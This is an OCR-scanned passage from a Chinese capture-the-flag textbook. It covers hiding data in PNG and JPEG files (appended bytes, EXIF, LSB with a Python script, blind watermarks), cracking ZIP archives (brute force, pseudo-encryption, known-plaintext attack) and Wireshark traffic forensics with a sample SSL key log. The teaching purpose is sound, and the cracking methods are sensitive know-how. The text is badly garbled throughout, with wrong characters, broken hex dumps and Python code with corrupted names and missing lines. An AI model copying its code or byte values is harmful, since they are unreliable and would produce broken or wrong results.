9.1.1 直接 附加 


大 部 分 文件 有 其 固定 的 文件 结构 ， 常 见 的 图 片 格式 如 PNG、JPG 等 都 是 由 一 系列 特定 的 数据 块 组 成 
的 。 


例如 ，PNG 文 件 由 IHDR (文件 头 数据 块 ) 、PLTE ( 调 色 板 数据 块 ) 、IDAT (图 像 数据 块 ) 、IEND 

(图 像 结束 数据 ) 四 个 标准 数据 块 和 一 些 辅助 数 据 块 组 成 。 每 个 数据 块 由 Length (长 度 ) 、Chunk 
Type Code (数据 块 类 型 码 ) 、Chunk Data (数据 块 数据 ) 和 CRC (循环 元 余 校 验 码 ) 四 部 分 组 
成 。 


PNG 文 件 总 是 由 固定 的 字 节 (89 50 4E 47 0D 0A 1A 0A) 开始 ， 我 们 一 般 可 以 根据 这 个 来 识别 该 广 
件 是 一 个 PNG 文 件 。 图 像 结 束 数据 IEND 用 来 标记 PNG 文 件 已 经 结束 。IEND 数 据 块 的 长 度 总 是 00 00 
00 00， 数 据 标 识 总 是 49 45 4E 44， 因 此 CRC 固 定 为 AE 42 60 82。 所 以 ， 一 般 PNG 文 件 以 固定 字 节 
00 00 00 00 49 45 4E 44 AE 42 60 82 作 为 结束 ， 其 后 的 内 容 会 被 大 部 分 图 片 查看 软件 忽略 ， 所 以 
可 以 在 IEND 数 据 块 后 增加 其 他 内 容 ， 这 样 并 不 会 影响 图 片 的 查看 ， 增 加 的 内 容 普通 情况 下 不 会 被 发 
现 。 


选取 一 张 PNG 图 片 ， 使 用 Windows 自 带 的 图 片 查 看 器 “Photos” 打 开 ， 如 图 9-1-1 所 示 。 使 用 二 进 
制 编辑 器 打开 该 PNG 图 片 ， 观 察 其 文件 头 和 文件 尾 ， 见 图 9-1-2 和 图 9-1-3。 


Photos - CTF.png 


FE oo 9 x: 
CT 


0000h : 89 50 4E 47 65 OA 和 而 00 00 00 号 49 48 而 52 


1lDFOh: E7 BF CA D7 F2 a FA 18 40 Al 00 00 00 00 49 45 No Ex u.@i IE 
1lE00h: 4E 44 RE 42 60 


图 9-1-3 
可 以 在 文件 结尾 任意 添加 内 容 ( 见 图 9-1-4) ， 如 直接 在 文件 结尾 添加 字符 "HELLO WORLD"。 仍 用 
“Photos” 打开 这 个 文件 ( 见 图 9-1-5) ， 友 现 其 与 修改 前 ( 见 图 9-1-1) 并 没有 任何 变化 ， 刚 刚 添 
加 的 "HELLO WORLD" 并 不 会 显示 在 图 片上 。 


1lDFOh: E7 BF CA D7 F2 27 FA 18 40 Al 00 00 00 00 49 45 GiBxo'u.@i IE 
1lEO00h: 4E 44 RE 42 60 82 00 48 45 4C 4C 4F 20 57 4F 52 Es .HELLO WOR 
1lEl0h: 4C 44 


图 9-1-4 


Photos - CTF.png 


IE 
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CT 


Peil 


图 9-1-5 
不 仅 是 字符 ， 我 们 甚至 可 以 将 其 他 文件 整个 添加 到 图 片 后 ， 通 过 图 片 查 看 器 也 不 会 看 到 任何 变化 。 


要 分 离 出 附加 在 图 片 后 面 的 文件 ， 可 以 通过 观察 二 进 制 中 隐 含 的 文件 头 信息 来 判断 图 片 中 附加 的 文件 
EP UD 


作 JPEG (jpg) : 文件 头 ，FF D8 FF; 文件 尾 ，FF D9。 

们 PNG (png) : 文件 头 ，89 50 4E 47; 文件 尾 ，AE 42 60 82。 

& GIF (gif) : 文件 头 ，47 49 46 38; 文件 尾 ，00 3B。 

们 ZIP Archive (zip) : 文件 头 ，50 4B 03 04; 文件 尾 ，50 4B。 
RAR Archive (rar) ， 文 件 头 : 52 61 72 21。 

学 Wave (wav) : 文件 头 ，57 41 56 45。 

学 AVI (avi) : 文件 头 ，41 56 49 20。 

他 MPEG (mpg) : 文件 头 ，00 00 01 BA。 
MPEG (mpg) : 文件 头 ，00 00 01 B3。 

学 Quicktime (mov) : 文件 头 ，6D 6F 6F 76。 


我 们 也 可 以 使 用 Binwalk 工 具 分 离 图 片 中 附加 的 其 他 文件 。Binwalk 其 实 是 一 款 开 源 的 固件 分 析 工 
具 ， 可 以 根据 固件 中 出 现 的 各 类 文件 的 一 些 特征 ， 识 别 或 提取 这 些 文 件 ， 因 此 在 CTF 中 Binwalk 常 常用 
于 从 一 个 文件 中 提取 出 它 包含 的 其 他 文件 。 如 PNG 图 片 结尾 附加 上 一 个 ZIP 文 件 的 二 进 制 内 容 ， 见 图 9 
os 


: 08 22 FC 00 10 44 F8 01 20 88 FO 03 40 8C FF FC "Ui..Dg. “6.@EYyi 
: E7 BF CA D7 F2 27 FA 18 40 Al 00 00 00 00 49 45 

: 4E 44 AE 42 60 82 50 4B 03 04 14 00 00 00 08 00 ND®B, 

: 97 70 30 4E 71 67 82 B1 56 10 09 00 6D 76 09 00 -pONgg,+V...mv.. 


图 9-1-6 
Binwalk 可 以 自动 分 析 一 个 文件 中 包含 的 多 个 文件 并 将 它们 提取 出 来 ， 见 图 9-1- 7。 


gsle2 EXP 


EXIF (Exchangeable Image File Format， 可 交换 图 像 文件 格式 ) 可 以 用 来 记录 数码 照片 的 属性 


信息 和 拍摄 数据 。EXIF 可 以 被 附加 在 JPEG、TIFF、RIFF 等 文件 中 ， 为 其 增加 有 关 数 码 相机 拍摄 信息 的 
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内 容 、 缩 略图 或 图 像 处 理 软件 的 一 些 版 本 信息 。 


选取 一 张 Windows 自 带 的 示例 图 片 (JPEG 格 式 ) ， 通 过 右键 查看 它 的 属性 ， 见 图 9-1-8， 其 中 保存 了 
作者 、 担 摄 日 期 、 版 权 等 信息 。 


Tom Alphin 
2008/2/11/ 周 一 11:32 


Microsoft Corporation 


1024 x 768 
1024 像素 
768 像素 
96 dpi 

96 dpi 

74 


图 9-1-8 
EXIF 数 据 结构 大 致 见 图 9-1-9 (参考 自 http://www.fifi.org/doc/jhead/exif-e.html) 。 用 二 进 制 
打开 这 个 图 片 ， 对 比 EXIF 结 构 ， 可 以 看 到 其 中 的 一 些 EXIF 信 息 ( 见 图 9-1-10) 。 我 们 可 以 使 用 二 进 制 
编辑 器 手工 修改 其 中 的 信息 ， 也 可 以 使 用 一 些 工具 (如 exiftool) 进行 EXIF 文 件 信息 的 查看 和 修改 。 


“exiftool-comment=ExifModifyTesting./Lighthouse.jpg” 为 这 张 图 片 添加 标签 ， 用 命 
“exiftool./Lighthouse.jpg” 可 以 查看 EXIF 信 息 ( 见 图 9-1-11) ， 发 现 增加 了 一 个 comment 标 


签 ， 内 容 为 ExifModifyTesting。 我 们 可 以 利用 这 种 方式 将 一 些 信息 隐藏 其 中 。 


FFEl APP1 Marker | 
SSSS APP1 Data Size 
45786966 0000 Exif Header 
49492A0008000000/4d4d002a00000008 TIFF Header(Little Endian) /TIFF Header(Big Endian) 
XXXX'…， Directory 
IFD0 (main image) - 
LELLELELE Link to IFD1 
XXXX… Data area of IFD0 
XXXX Directory 
Exif SubIFD 
End of Link : 
Data area of Exif SublFD 
Directory 
Interoperability IFD 
End of Link 
Data area of Interoperability IFD 


Directory | 
Makernote IFD 

End of Link z 
Data area of Makernote IFD : 


Directory | 
IFD1(thumbnail image) 

End of Link | 
Data area of IFD1 


Thumbnail image 


0000h: YOYa. .JFIF 
0010h: eidoDerd. 
0020h: ELL 
0030h: 2 
0040h: 

0050h: 

0060h: 

0070h : 

0080h : 

0090h : 

00A0h: UUSee T3740r32. 
00BOh: Tom Alphin.Micro 
00COh: soft Corporation 
00DOh: 
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F9 
02 
B4 
3A 
38 2251.200802:1 
00 a 
1A 


图 9-1-10 


图 9-1-11 


S533ESB 


LSB 即 Least Significant Bit (最 低 有 效 位 ) 。 在 大 多 数 PNG 图 像 中 ， 每 个 像素 都 由 RR、G、B 三 原色 
组 成 (有 的 图 片 还 包含 A 通道 表示 透明 度 ) ， 每 种 颜色 一 般 用 8 位 数据 表示 (0x00 ~ 0xFF) ， 如 果 修 


改 其 最 低位 ， 人 眼 是 不 能 区 分 出 这 种 微小 的 变化 的 。 我 们 可 以 利用 每 个 像素 的 R、G、B 颜 色 分 量 的 最 
人 低 有 效 位 来 隐藏 信息 ， 这 样 每 个 像素 可 以 携 市 3 位 的 信息 。 


先 准 备 一 张 图 片 ( 见 图 9-1-12) ， 再 将 一 个 字符 串 用 LSB 的 方式 隐藏 在 这 张 图 片 中 。 


图 9-1-12 


#coding:utf-8 
from PIL import Image 


def lsb_decode(l, infile, outfile): 
f = open(outfile, "wb") 
abyte=0 
img = Image.open(infile) 
lenth = Lx8 


width = ing,.size[9] 
height = ing.size[1] 
count = 0 
for h in range(0, height): 
for Ww in range(©, width): 
pixel = img.getpixel((w, h)) 
for i in range(3):; 
abyte = (abyte<<1)+(int(pixel[1])51) 
ount+=1 


GS 

if count%8 == 0: 
f.write(chr(abyte)) 
abyte = 9 


or iins: 
Str +=(bin(ord(i))[2:]).rjust(8,'90') 
return str 
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def lsb_encode(infile,data,outfile): 
img = 
width = ing,size[6] 
height = ing.size[1] 
count = 9 
msg = str2bin(data) 
mLen = len(msg) 
for h in range(9,height): 
for mw in range(9,width): 
pixel = img.getpixel((w,h)) 
rgb=[pixel[0], pixel[1],pixel[2]] 
i in range(3): 
rgb[i] = rgb[i] & Oxfe + int(msg[count])&1 
t+=1 


count >= mlen : 
img.putpixel((w,h), (rgb[9], rgb[1], rgb[2])) 


img.putpixel((w,h), (rgb[8] ,rgb[1], rgb[2])) 
if count >=mlen : 


if count >= mLen : 
reak 


img,save(outfile) 


# 夺 用 
old = "./testing.png" 


了 殉 写 后 的 图 片 
new = "./out.png” 


# 雪 要 隐藏 的 信息 
enc = "LSB_Encode_Testing" 


# 信 息 提 取出 后 所 存放 的 文件 
flag = "./get_flag.txt" 


lsb_encode(old, enc, new) 
lsb_decode(18,new, flag) 


调用 lsb_encode() 方 法 ， 生 成 隐 写 后 的 图 片 见 图 9-1-13， 肉 眼 并 不 能 看 出 明显 变化 ， i 
Telele [S 
(0 方法 会 提取 出 隐 写 的 内 容 ， 见 图 9-1-14。 


图 9-1-13 


剧 | get flag.txt - 记事 本 


文件 (站 ” 编 辐 (E) 格式 (DO) 富 
LSB Encode Testing 


图 9-1-14 
在 CTF 中 ， 检 测 LSB 隐 写 痕迹 的 常用 工具 是 Stegsolve。Stegsolve 还 可 以 查看 图 片 不 同 的 通道 ， 对 图 
片 进行 异 或 对 比 等 操作 。 用 Stegsolve 打 开 生成 的 隐 写 图 片 out.png， 提 取 R、G、B 三 个 通道 的 最 低 有 
效 位 ， 见 图 9-1-15， 同 样 可 以 提取 刚刚 隐藏 在 图 片 中 的 字符 串 。 


四 
Extract Preview 


4c53425f456e636f 64655f5465737469 LSB Enco de Testi 
6e67ffffffftfftfftf ffftftftftfftfftftftftfttt ng 
fffLEEELELEELLELLEE 下 在 丰 在 于 在于 下 下 下 大 在 下 在 大 

££fffffffffffffff fffffffffffffff 

ffffffffffffffff ffffffFEEEEEEEEE 

EEEELEEEEIEELL LEEELESEELELELEE 

EEEEEELEEEEEEEE EEEEEEEEEEEELEE 

了 二 
4 
人 





Bit Planes 

Alpha D7 口 6 Os 
Red 7 D6 Os 
Green 口 7 口 6 口 5 
Blue 口 7 品 6 品 5 


Preview Settings 
Include Hex Dump In Preview [x] 


图 9-1-15 


对 于 PNG 和 BMP 图 片 中 的 LSB 等 弟 见 的 隐 写 方式 ， 我 们 也 可 使 用 zsteg 工 具 (https://github.com/ 
z 
-0xff/zsteg) 直接 进行 目 动 化 的 识别 和 提取 。 


ed 


9.1.4 盲 水 印 
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数字 水 印 扩 林 可 以 将 信息 秦 入 图 片 、 音 频 等 数字 载体 中 ， 但 以 人 类 的 视 部 或 者 听 况 无 法 分 辨 只 有 
过 特殊 的 手段 才能 读 取 。 

图 片 中 的 盲 水印 可 以 添加 在 图 片 的 空域 或 频 域 。 空 域 技术 是 直接 在 信号 空间 中 藤 入 水 印信 息 ， 
方式 比较 简单 ，LSB 可 以 算是 一 种 在 空域 中 添加 水 印 的 方式 ,。 


这 里 主要 介绍 在 频 域 中 添加 的 讶 水印 。 什 么 是 频 域 ” 如 图 9-1-16 是 一 段 音 乐 的 时 域 ， 我 们 平常 听 到 的 
音乐 就 是 一 段 在 时 域 上 不 断 振动 的 波 。 








图 9-1-16 
但 是 这 段 音乐 同样 可 以 表示 成 图 9-1-17 所 示 的 乐谱 ， 每 个 音符 在 不 同 的 线 间 可 以 表示 不 同 的 音 高 ， 即 
频率 。 一 段 乐谱 就 可 以 看 作 一 段 音 乐 在 频 域 中 的 表示 ， 可 以 反映 音乐 频率 的 变化 。 如 果 时 域 中 的 波形 
简化 成 一 段 正 弦 波 ， 那 么 在 频 域 中 用 一 个 音符 即 可 表示 。 


图 9-1-17 
要 把 时 域 或 空域 中 表示 的 信号 转换 到 频 域 ， 融 要 用 到 传 里 叶 变 换 (Fourier Transform) 。 传 里 叶 变 
损 源 目 对 传 里 叶 级 数 的 研究 。 在 对 传 里 叶 级 数 的 研究 中 ， 复 杂 的 周期 国 数 可 以 用 一 系列 简单 的 正弦 流 
之 和 表示 。 将 信号 为数 进行 传 里 叶 变 损 ， 可 以 分 离 出 其 中 各 频率 的 正弦 波 ， 不 同 成 分 频率 人 在 频 域 中 以 
峰值 形式 表示 ， 融 可 以 得 到 其 频 谐 。 相 天 内 容 可 以 参考 “信号 与 系统 ”的 教材 。 


得 到 图 片 的 频 域 图 像 后 ， 将 水 印 编码 后 随即 分 布 到 各 频率 ， 然 后 与 原 图 的 频 域 进行 看 加 ， 将 苹 加 水 印 
的 频谱 进行 全 里 叶 逆 变换 ， 即 可 得 到 添加 了 盲 水 印 的 图 片 。 这 种 操作 相当 于 往 原 来 的 信号 中 加 入 了 品 
声 ， 这 些 噪 声 毅 布 全 图 ， 在 空域 上 并 不 容易 对 图 片 造成 破坏 。 


要 提取 出 图 片 中 的 盲 水 纯 ， 只 需 把 原 图 和 市 水 印 的 图 在 频 域 中 相 减 ， 然 后 根据 原来 的 水 印 编码 方式 进 
行 解码 ， 即 可 提取 出 水 印 。 


CTF 中 一 般 可 以 使 用 BlindWaterMark (https://github.com/chishaxie/BlindWaterMark) 工 
具 对 图 片 进行 盲 水 印 的 添加 和 提取 。 类 似 近 术 在 音频 中 也 音 音 出现， 对 于 音频 中 的 频谱 隐 写 ， 我 们 可 
以 简单 地 使 用 Adobe Audition 等 工具 直接 查看 频谱 从 而 拿 到 flag。 


9.1.5 隐 瑟 术 小 结 

图 片 隐 写 的 方式 还 有 很 多 种 。 广 义 上 ， 只 要 通过 某 种 方式 将 信息 隐藏 到 图 片 中 而 难以 通过 普通 万 式 友 
现 ， 束 可 以 称 为 图 片 隐 瑟 。 本 市 只 对 一 些 常 见 的 图 片 隐 和 写 方 式 进行 了 简单 介绍 ， 读 者 可 以 在 理解 图 片 
隐 写 常见 的 基本 原理 后 ， 自 行 尝 试 通过 不 同方 式 对 图 片 进行 隐 写 。 
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9.2 压缩 包 人 加 密 
1. 暴力 破解 


暴力 破解 是 最 直接、 人 简单 的 攻击 方式 ， 适 合 密码 较为 简单 或 是 已 知 密码 的 格式 或 学 围 时 使 用 ， 相 关 工 
具有 Windows 的 ARCHPR 或 者 Linux 的 命令 行 工 具 fcrackzip。 


2. ZIP 伪 加 密 


在 ZIP 文 件 中 ， 文 件 头 和 每 个 文件 的 核心 目录 区 都 有 通用 标记 位 。 核 心目 录 区 的 通用 标记 位 距离 核心 
目录 区 头 504B0102 的 偏 移 为 8 字 节 ， 其 本 身 占 2 字 节 ， 最 低位 表示 这 个 文件 是 否 被 加 密 ( 见 图 9-2 
1) ， 将 其 改 为 0x01 后 ， 再 次 打开 会 提示 输入 密码 ( 见 图 9-2-2) 。 但 此 时 文件 的 内 容 并 没有 真 的 被 
加 密 ， 所 以 被 称 为 伪 加 密 ， 只 要 将 该 标志 位 重新 改 回 9， 即 可 正常 打开 。 


: 50 4B 03 04 14 00 00 00 08 00 EA 22 A2 4E 07 3B 
: 1E FE1400'000012°00%00°00"0C°"00%00°00%67 65 
: 74 5F 66 6C 61 67 2E 74 78 74 F3 09 76 8A 77 CD 
: 4B CE 4F 49 8D OF 49 2D 2E C9 CC 4B 07 00 50 4B 
14 00 14 00 
00 00 12 00 00 00 0C 00 24 

: 00 00 00 00 80 00 00 00 00 00 00 00 67 € 
flag.tx 

Tr [.0.U+YU 
:| 3A 5B D6 01'00 6C 9F B7|5B 00 DS 01 5048 .05 06 0 TEY [. 0. a 
: 00 00 00 00 01 00 01 00 SE 00 00 00 3E 00 00 00 
: 00 00 


图 9-2-2 
除了 修改 通用 标志 位 ， 用 前 文 提 到 的 Binwalk 工 具 的 “binwalk-e” 命 令 也 可 以 无 视 伪 加 密 ， 从 压缩 
包 中 提取 文件 。 此 外 ， 在 MacOs 中 也 可 以 直接 打开 伪 加 密 的 ZIP 压 缩 包 。 
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类 似 地 ， 文 件 头 处 的 通用 标记 位 距离 文件 头 504B0304 的 偏 移 为 6 字 节 ， 其 本 身 占 2 字 节 ， 最 低位 表示 
这 个 文件 是 否 被 加 密 。 但 该 位 被 改 为 0x01 的 伪 加 密 压 缩 包 不 能 通过 Binwalk 或 MacOS 和 直接 提取 ， 而 需 
要 手动 修改 标志 位 。 


3. 已 知 明文 攻击 


我 们 为 ZIP 压 缩 文件 所 设 定 的 密码 ， 先 被 转换 成 了 3 个 4 字 节 的 key， 再 用 这 3 个 key 加 密 所 有 文件 。 如 
果 我 们 能 通过 某 种 方式 拿 到 压缩 包 中 的 一 个 文件 ， 然 后 以 同样 的 方式 压缩 ， 此 时 两 个 压缩 包 中 相同 的 
那个 文件 的 压缩 后 大 小 会 相差 12 字 节 ， 用 ARCHPR 进 行 对 比 筛选 后 ， 就 可 以 获得 key ( 见 图 9-2 
3) ， 继 而 根据 这 个 Key 恢复 出 未 加 密 的 压缩 包 〈 见 图 9-2-4) 。 对 于 较 短 的 密码 ， 我 们 可 以 等 待 

进行 恢复 ， 但 我 们 更 关注 压缩 包 的 内 容 ， 所 以 往往 会 选择 不 去 爆破 密码 。 这 种 攻击 方式 便 是 已 知 
明文 攻击 。 由 于 篇 幅 所 限 ， 这 里 不 再 深入 讲解 这 种 攻击 方式 的 具体 原理 ， 对 此 感 兴趣 的 读者 可 以 自行 
搜索 相关 资料 进行 学 习 。 


文件 (了 恢复 (R) 帮助 (H) 
.SS 001 
打开 ”开始 ! 停止 基准 测 谍 升级 帮助 关于 退出 
加 密 的 ZIP/RAR/ACE/ARJ 文件 攻击 类 型 


|\WacHome Downioads book YPA.zp 
tt - ~ dH 二 1 晤 大 - 潜 ] 疡 Tn 


Advanced Archive Password Recovery 统计 信息 : 
n/a 
11s 926ms 
n/a 
未 找到 
[d087eb63 375335b3 68557e28 ] 


压缩 后 大 小 原始 大 小 ”类 型 
597,892 601,882 ”PNG 文件 


文件 (F) ”编辑 (E) 格式 (O) 查看 (V) 帮助 (H) 
Known-plaintext attack 


4. 小 结 


压缩 包 攻 击 的 方式 不 多 ， 如 果 使 用 较 强 的 密码 且 压 缩 包 内 的 文件 没有 泄露 ， 或 使 用 不 同 的 密码 或 加 密 
方式 对 同一 个 压缩 包 中 不 同 的 文件 进行 加 密 ， 一 般 很 难 破解 加 密 压缩 包 的 文件 。 
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9.3 取证 技术 


现实 中 的 电子 取证 是 指 利用 计算 机 软件 、 硬 件 拷 术 ， 以 符合 法 律 规范 的 方式 对 计算 机 入 侵 、 破 坏 、 欺 
诈 、 攻 击 等 犯罪 行为 进行 证 据 获 取 、 保 存 、 分 析 和 出 示 的 过 程 。 而 CTF 中 的 取证 相关 题目 是 通过 对 包 
合 相 关 记 录 和 痕迹 的 文件 进行 分 析 ， 如 流量 包 、 日 志文 件 、 磁 盘 内 存 镜像 等 ， 从 中 获取 出 题 人 放置 的 

的 过 程 。 取 证 相关 题目 的 特点 是 信息 量 较 大 ， 逐 个 分 析 可 能 需要 非常 长 的 时 间 ， 因 此 掌握 高 效 的 
分 析 方 法 是 非 营 必 要 的 。 


本 节 将 介绍 CTF 中 三 种 常见 的 取证 场景 ， 即 流量 分 析 、 内 和 存 镜像 取证 和 磁盘 镜像 取证 ， 读 者 需要 掌握 
的 前 置 知识 包括 计算 机 网 络 基础 、 文 件 系统 基础 和 操作 系统 基础 。 


9.3.1 流量 分 析 


9.3.1.1 Wireshark 和 Tshark 


流量 包 一 般 是 指 利用 tcpdump 等 工具 ， 对 计算 机 上 的 某 个 网 络 设备 进行 流量 抓 取 所 获得 的 PCAP 格 式 
的 流量 文件 。 图 形 化 工具 Wireshark 和 它 的 命令 行 工 具 Tshark 可 以 对 这 种 流量 包 进 行 分 析 。 st 
Iresna 

是 免费 软件 (官网 为 https://www.wireshark.org/) ， 文 持 多 种 协议 的 分 析 ， 也 支持 流量 抓 取 功 


台 b 
有 E。 


Wireshark 的 界面 见 图 9-3-1， 载 入 流量 包 后 即 可 看 到 网 络 流量 ， 协 议和 状态 以 颜色 区 分 ， 单 击 菏 条 流 
量 即 可 看 到 流量 的 详细 信息 。 在 过 滤器 柱 中 输入 过 滤器 表达 式 ， 即 可 对 流量 进行 过 滤 ， 查 看 需要 的 网 
络 流 量 。 若 想 过 滤 FTP 协 议 的 网 络 流 量 ， 输 入 FTP 表 达 式 即 可 查看 结果 ( 见 图 9-3-2) 。 


Tshark 是 Wireshark 的 命令 行 工 具 ，Wireshark 会 在 内 存 中 建立 流量 包 的 元 数据 ， 因 此 Tshark 在 分 析 
巨大 流量 包 时 作用 显著 ， 可 以 明显 提升 性 能 。Tshark 的 命令 行 参数 非常 复杂 ， 具体 使 用 方法 可 以 到 |， 

://www.wireshark.org/docs/man-pages/tshark.html 查 看 。 与 前 文 相同 的 流量 包 中 过 滤 FTP 
协议 的 例子 见 图 9-3-3。 


9.3.1.2 流量 分 析 常 见 操作 
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Wireshark 的 “统计 ”菜单 可 以 查看 流量 包 的 大 致 情况 ， 如 包含 哪些 协议 、 哪 些 IP 地 址 参与 了 会 话 
等 。 图 9-3-4、 图 9-3-5 分 别 为 协议 分 级 统计 和 会 话 统计 。 这 两 个 功能 可 以 帮助 我 们 快速 定位 到 需要 分 
析 的 点 ， 因 为 CTF 中 的 流量 分 析 往 往 会 有 很 多 干扰 流量 ， 而 出 题 人 出 题 所 需 的 流量 一 般 是 在 局 域 网 中 
或 特定 的 几 台 主机 中 获取 的 ， 通 过 查看 流量 信息 可 以 大 大 节省 寻找 需要 分 析 的 流量 的 时 间 。 


协议 Y 按 分 组 百分比 分 组 按 字 节 百分比 字 节 
TY Frame 100.0 17953 100.0 16633916 
Y Ethernet 100.0 17953 1.5 251342 
Y Internet Protocol Version 6 213 0.1 8520 
Y User Datagram Protocol 1.0 178 0.0 1424 
Link-local Multicast Name Resolution 0.0 2 0.0 44 
Domain Name System 1.0 175 0.1 21194 
Transmission Control Protocol 0.0 0.0 96 
Internet Control Message Protocol v6 0.2 0.0 1012 
Y Internet Protocol Version 4 98.7 354540 
Y User Datagram Protocol 0.7 1064 
Simple Service Discovery Protocol 0.1 2096 
NetBIOS Name Service 0.0 , 150 
Link-local Multicast Name Resolution 0.0 LU 44 
Y Transmission Control Protocol 98.0 15991818 
Secure Sockets Layer 11.9 15642468 
Malformed Packet 0.0 上 0 
FTP Data 0.2 ! 29435 
File Transfer Protocol (FTP) 0.4 Yl 2069 
Data 0.1 I 2819 
Internet Group Management Protocol 0.0 ' 80 
Internet Control Message Protocol 0.0 52 
Address Resolution Protocol 0.1 392 


Exhernet .8 ipv4"35 Pv6:12 TCP. 86 UDP. 102 
】 Byres 和 


总 全 


信人 全 攻 全 负 全 全 总 全 区 人 区 台 


和 
oSoNomnowmsd 
和 
ve 28= 全 
onooooodnrn 


Ee a 名 
人 
[全 


贡 贡 贡 贡 贡 贡 贡 贡 范 贡 贡 贡 贡 员 东 
33333533533338388 
了 
Sooa3so-ocoooowow 
8 < 


192.168. 
192.168. 
192.168. 
192.168. 
192.168. 
192.168. 
192.168. 
192.168. 
192.168. 
192.168. 
192.168. 
192.168. 
192.168. 
192.168. 
192.168. 


2 二 
SE 
EP 


在 计算 机 网 络 中 使 用 最 广泛 的 传输 层 协议 是 TCP。TCP 是 一 种 面向 连接 的 协议 ， 传 输 双 方 可 以 保证 传 
输 的 透明 性 ， 只 需 关心 自己 拿 到 的 数据 。 然 而 ， 在 实际 的 传输 过 程 中 ， 由 于 MTU 的 存在 ，TCP 流 量 会 
被 切 分 为 很 多 小 的 数据 报 ， 导 致 不 方便 分 析 。 针 对 此 种 情况 ，Wireshark 提 供 了 追 踊 TCP 流 功能 ， 只 
要 选中 某 条 数据 报 ， 右 键 单 击 “ 追 踪 TCP 流 ” ， 即 可 获取 该 TCP 会 话 中 双方 传输 的 所 有 数据 ， 方 便 进 
一 步 分 析 ， 见 图 9-3-6。 


PASV 

227 Entering Passive Mode (182,254,217,142,47,56). 

RETR ff 

156 Opening BINARY mode data connection for flag (7 bytes), 

226 Transfer complete. 

TYPE I 

206 Switching to Binary mode. 

PASV 

227 Entering Passive Mode (182,254,217,142,120,115). 
flag.zip 


156 Opening BINARY mode data connection for flag.zip (217 bytes). 
226 Transfer complete. 


TYPE A 

200 Switching to ASCII mode， 

PASV 

227 Entering Passive Mode (182,254,217,142,116,158). 
RETR f 


156 0pening BINARY mode data connection for flag (7 bytes)， 
226 Transfer complete. 


TYPE I 

206 Switching to Binary mode。 

PASV 

227 Entering Passive Mode (182,254,217,142,31,103). 

RETR flag.zip 

156 Opening BINARY mode data connection for flag.zip (217 bytes). 
226 Transfer complete. 

CWD /mydata/gay 

256 Directory successfully changed. 


TYPE A 
206 Switching to ASCII mode. 
PASV 


15 前 户 诺 分 组 , 20 展 务 孝 分 组 , 29 turn(s), 
Entire conversation (1024 bytes) 显示 和 保存 数据 为 ”ASCII 


图 9-3-6 
对 于 HTTP 等 常见 协议 ，Wireshark 提 供 了 导出 对 象 功能 ( “文件 ”菜单 中 ) ， 可 以 方便 地 提取 传输 过 
程 发 送 的 文件 等 信息 。 图 9-3-7 是 导出 HTTP 对 象 的 功能 . 


分 组 A 主机 名 内 容 类 型 大 小 文件 名 
163 imgstat.baidu.com image/gif 43 bytes clientcon.gif? =1508260192995 
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imgstat.baidu.com image/gif 43 bytes clientcon.gif?_=1508260193777 
gt2.baidu.com image/gif 35 bytes sp613.gif?t=1508260193005 
imgstat.baidu.com image/gif 43 bytes clientcon.gif?_=1508260194663 
imgstat.baidu.com image/gif 43 bytes clientcon.gif?_=1508260197394 
hm.baidu.com image/gif 43 bytes hm.gif?cc=0&ck=1&cl=24-bit&ds=1920x1080&ep=lis 
pan.baidu.com image/jpeg 44 bytes analytics?_lsid=1508260199290&_lsix=1&clienttype=! 
pan.baidu.com image/jpeg 44 bytes analytics? lsid=1508260199293& lsix=1&clienttype=! 
pan.baidu.com image/jpeg 44 bytes analytics?_lsid=1508260199300&_lsix=1&clienttype=! 
pan.baidu.com imagejipeg 44 bytes analytics?_lsid=1508260199300&_lsix=1&clienttype=! 
pan.baidu.com application/json 383 bytes download?sign=XekZm95xrHfLCUvXIEfOPnU6wouCP 
pan.baidu.com image/jpeg 44 bytes analytics? lsid=15082601997018&_lsix=1&clienttype=( 
hm.baidu.com image/gif 43 bytes hm.gif?cc=0&ck=1&cl=24-bit&ds=1920x1080&ep=ch 
update.pan.baidu.com text/html 11 bytes download&ajaxdata=%22success%22 
d.pcs.baidu.com text/plain 51 bytes e56e57b2ff4745d273ea711004dedf58?fid=4145147< 
nj02all02.baidupcs.com application/zip 6849 kB e56e57b2ff4745d273ea711004dedf58?bkt=p3-0000 
imgstat.baidu.com image/gif 43 bytes clientcon.gif? =1508260241787 
imgstat.baidu.com image/gif 43 bytes clientcon.gif? =1508260242661 
imgstat.baidu.com image/gif 43 bytes clientcon.gif?_=1508260290912 
imgstat.baidu.com image/gif 43 bytes clientcon.gif?_=1508260323002 
imgstat.baidu.com image/gif 43 bytes clientcon.gif?_=1508260323729 
hm.baidu.com image/gif 43 bytes hm.gif?cc=0&ck=1&cl=24-bit&ds=1920x1080&ep=lis 
pan. baidu com image/] jpeg 44 bytes enelytice?. dv1508200328220& jeivai8cienttype 


wm lel, ~- mm AN iv 内 mm ml ii mA MN Ns NN Nh 








Save All Close Save 


图 9-3-7 
有 时 需要 分 析 的 流量 包 几 乎 都 是 SSL 协 议 的 加 密 流 量 ， 如 果 能 够 从 题目 中 的 其 他 位 置 获取 SSL 密 钥 日 
志 ， 那 么 可 以 使 用 Wireshark 尝 试 解密 流量 。Wireshark 可 解析 的 SSL 密 钥 日 志文 件 如 下 所 示 : 


CLIENT_RANDOM cbdf25c6b2259agb386b735427629e94abe5b679634c79bd9efd7ee76cgb9dc66782ad3aa59 
38c43831971a06e9a2geac276075d559799769ce5d1la3ea85211c981d8e67f75d6fd1l1lfcf5536f331a968b 
CLIENT_RANDONM 247f3372606065429dc7e917e51f8b964309685ec8688296011lcd3c53e5bafa75a 921ffbf7bf 
e6d8c3936000f34eab6dc20486e629bdc99f21b6637c3df5592ef91fffcaldc8215699687a98febd45auceg 
CLIENT_RANDOM 200gcef83c759e5egc8bbdbdga65388df25014fc326686160577ccd92d5fa3e3e 4c63f7a409 
b6e0ab7agb793485696c02ab7743cla9fda6039b9f7ac095205cf209d585526lece18897dbe43al116b73627 
CLIENT_RANDOM c5dd1755eff2a51b5d4a499geca2cc261d9b637cd8ad217566f21194e19d6f66 c3a665698 
b99629875b03d6754597349612e6e7468ef66dcf8f277f9e84396ae55alb72248919df1608ca3962f617252 
CLIENT_RANDONM llael449556a6e740fd9a18d0264cdudc49749355dcf7093daad965030a21fcfe 219786b326 
ccf769cd787de3cc7eldcd668ala3d336170334f879b961cec81131fff4859ce5c6eal15d907be8a36638b7 


当 获 取 到 这 种 形式 的 密 钥 日 志 后 ， 我 们 可 以 打开 Wireshark 的 首选 项 ， 在 “协议 ”选项 中 选择 SSL 协 
